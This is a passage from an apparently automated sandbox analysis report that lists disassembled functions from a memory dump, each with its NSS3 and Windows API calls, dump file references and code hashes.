                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C681444,?,00000001,?,00000000), ref: 6C680E16
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?), ref: 6C680E53
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?,?,6C681444,?,?,00000000), ref: 6C680E65
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?), ref: 6C680E79
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: TlsGetValue.KERNEL32(00000000,?,6C660844,?), ref: 6C69157A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: EnterCriticalSection.KERNEL32(?,?,?,6C660844,?), ref: 6C69158F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: PR_Unlock.NSS3(?,?,?,?,6C660844,?), ref: 6C6915B2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C661397,00000000,?,6C65CF93,5B5F5EC0,00000000,?,6C661397,?), ref: 6C65B1CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65B1A0: free.MOZGLUE(5B5F5EC0,?,6C65CF93,5B5F5EC0,00000000,?,6C661397,?), ref: 6C65B1D2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6589E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6588AE,-00000008), ref: 6C658A04
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6589E0: EnterCriticalSection.KERNEL32(?), ref: 6C658A15
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6589E0: memset.VCRUNTIME140(6C6588AE,00000000,00000132), ref: 6C658A27
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6589E0: PR_Unlock.NSS3(?), ref: 6C658A35
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d7904a30215434cf40ff0d580d29baac3bfee7b5573a417acbadae964fd624ba
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 63f392d485fecf3afbd21abb644ee84c3b258e9bfc2a64b352ed74a56057b096
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7904a30215434cf40ff0d580d29baac3bfee7b5573a417acbadae964fd624ba
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1351C7F6D022005FEB009F64DC85AAF37A8AF46358F550424ED1597B12F731ED1986BA
                                                                                                                                                                                                                                                                                                                                                          Function 6C636E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C636ED8
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C636EE5
                                                                                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C636FA8
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?), ref: 6C636FDB
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C636FF0
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C637010
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C63701D
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C637052
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1920323672-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e7b0f62aa401ff40c13e7ec8d09264c2629589e3a106e9106bd832d9d6e4244d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 841521b142651250b52b1a85e278effa557c03d39515d5c4235531f9fd6f8839
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7b0f62aa401ff40c13e7ec8d09264c2629589e3a106e9106bd832d9d6e4244d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E661B1B1E142298BDB00CF65CE407EEB7B2BF45308F286168D419AB751E735DC15CB98
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C6A7313), ref: 6C6A8FBB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C648298,?,?,?,6C63FCE5,?), ref: 6C6A07BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6A07E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A081B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A0825
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A9012
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A903C
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A909E
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A90DB
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A90F1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C6A7313), ref: 6C6A906B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C6A7313), ref: 6C6A9128
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3590961175-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2bd7b65947a6d555f7b625a72ff7a9b12d680ba8658dbd36c12ca3a764951f52
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5751A271A002018FEB109FAADC44B66B3F5AF4535CF254069D925D7B61EB32EC06CBA9
                                                                                                                                                                                                                                                                                                                                                          Function 6C659C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C660715), ref: 6C658859
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658850: PR_NewLock.NSS3 ref: 6C658874
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C65888D
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C659CAD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C659CE8
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C65ECEC,6C662FCD,00000000,?,6C662FCD,?), ref: 6C659D01
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C65ECEC,6C662FCD,00000000,?,6C662FCD,?), ref: 6C659D38
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C65ECEC,6C662FCD,00000000,?,6C662FCD,?), ref: 6C659D4D
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C659D70
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C659DC3
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C659DDD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C660725,00000000,00000058), ref: 6C658906
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: EnterCriticalSection.KERNEL32(?), ref: 6C65891A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C65894A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: calloc.MOZGLUE(00000001,6C66072D,00000000,00000000,00000000,?,6C660725,00000000,00000058), ref: 6C658959
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C658993
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6588D0: PR_Unlock.NSS3(?), ref: 6C6589AF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3394263606-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6547e6c4b1d3d9707688cd69e3f9e626a41365378bbdbd2811da5c0783285567
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8a6329c5cc5176889668610fe97f742a7cec04d3ce2e184596e333cc6bcea2d5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6547e6c4b1d3d9707688cd69e3f9e626a41365378bbdbd2811da5c0783285567
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 765183B0A05B058FDB00EF68C1846AEBBF0BF4534DF658669D898DBB10DB30E855CB95
                                                                                                                                                                                                                                                                                                                                                          Function 6C6888E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6888FC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE30: SECOID_FindOID_Util.NSS3(6C65311B,00000000,?,6C65311B,?), ref: 6C69BE44
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C688913
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C76D864,?), ref: 6C688947
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C69E245
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C69E254
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C68895B
                                                                                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C688973
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C688982
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6889EC
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C688A12
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2145430656-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fa30f51d42a3453f21c8eb695c8b5445b71c19ef4b4e3d71f4482cb6244ed1fd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2b8f83cc5f08fbdec9de824928c0c2d448360c0404b5a348014ca09db6152e94
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa30f51d42a3453f21c8eb695c8b5445b71c19ef4b4e3d71f4482cb6244ed1fd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2317DB1A0660053FF10562DAC417DA32995F9A32CF240637D919D7BA1FB21C84682AF
                                                                                                                                                                                                                                                                                                                                                          Function 6C64DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C64DCFA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C64DD40
                                                                                                                                                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C64DD62
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C64DD71
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C64DD81
                                                                                                                                                                                                                                                                                                                                                          • CERT_RemoveCertListNode.NSS3(?), ref: 6C64DD8F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: TlsGetValue.KERNEL32 ref: 6C6606C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: EnterCriticalSection.KERNEL32(?), ref: 6C6606D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: PR_Unlock.NSS3 ref: 6C6606EB
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C64DD9E
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C64DDB7
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 653623313-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 688e00fdd10f2d52cd28267bff3d714f15ec3c90b22f976aaba86ac76c0ef826
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF218CB6E011259BDB01DEA4DC409DEBBF8AF05318F14C024EC18A7701E721E914CBEA
                                                                                                                                                                                                                                                                                                                                                          Function 6C750860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_LogFlush.NSS3(00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C75086C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750930: EnterCriticalSection.KERNEL32(?,00000000,?,6C750C83), ref: 6C75094F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C750C83), ref: 6C750974
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750983
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750930: _PR_MD_UNLOCK.NSS3(?,?,6C750C83), ref: 6C75099F
